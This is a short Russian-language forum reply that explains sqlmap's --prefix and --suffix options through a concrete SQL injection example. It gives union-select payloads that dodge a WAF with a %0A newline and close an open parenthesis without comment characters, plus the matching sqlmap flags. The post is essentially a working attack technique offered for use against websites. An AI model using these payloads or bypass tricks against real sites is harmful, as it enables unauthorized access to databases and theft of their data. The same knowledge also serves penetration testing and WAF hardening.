12.05.2017, 14:03
|
|
Постоянный
Регистрация: 10.02.2012
Сообщений: 830
Провел на форуме:
300820
Репутация:
90
|
|
Сообщение от Xsite
↑
Кхм , можешь обьяснить на примере самой обычной скули ,как правильно юзать --prefix --suffix
предположим есть скуль вида
Код:
?id=7') union select 1,2,3,4
waf блокирует запрос, но проверка не проверяет что строка многострочная, добавляем перенос строки %0A
Код:
?id=7')%0A union select 1,2,3,4
символы комментариев запрещены, а нам надо как то корректно закрыть запрос(открытую скобку), добавляем
Код:
?id=7')%0A union select 1,2,3,4 and 1=('1
чтобы объяснить это скульмапу используем
--prefix=" ')%0A" --suffix=" and 1=('1"
примерно так, в общем prefix и suffix нужны для кастомизации запроса, prefix - вначале, suffix - в конце
|
|
|